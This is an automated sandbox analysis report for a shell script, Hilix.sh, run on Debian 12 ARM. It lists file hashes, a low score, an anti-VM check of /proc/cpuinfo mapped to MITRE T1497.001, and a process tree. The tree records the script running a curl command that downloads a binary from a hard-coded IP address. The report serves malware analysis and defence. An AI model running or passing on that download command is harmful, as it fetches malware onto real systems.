07744254fcb79b4e78cb7c1512db30dc3bb825c1ea6ab11725917fc6bb035782

Resubmissions

02-01-2025 21:15

250102-z3zhbaypfj 4

02-01-2025 08:18

250102-j7arravrbp 10

Analysis

max time kernel
58s
max time network
61s
platform
debian-12_armhf
resource
debian12-armhf-20240221-en
resource tags

arch:armhfimage:debian12-armhf-20240221-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem
submitted
02-01-2025 21:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hilix.sh
Size

1KB
MD5

0c55987ace1771c5cb8533da3b2ba271
SHA1

dedbf64de308bb11070bbe67f8c046b4602b7903
SHA256

07744254fcb79b4e78cb7c1512db30dc3bb825c1ea6ab11725917fc6bb035782
SHA512

68d6db0fbcf4dd9c4486703adcad76439082ddb22c0e4450fdb60c2355ce70017673dd8bbaa2db269e273356a75ecff1348e9ea6762a4acc903408bddc025b09

Score

4^/10

antivm

Malware Config

Signatures

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

/tmp/Hilix.sh
/tmp/Hilix.sh
1⤵
PID:709
- /usr/bin/curl
  curl -O http://51.79.141.121/bins/Hilix.x86
  2⤵
  - Checks CPU configuration
  PID:717

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads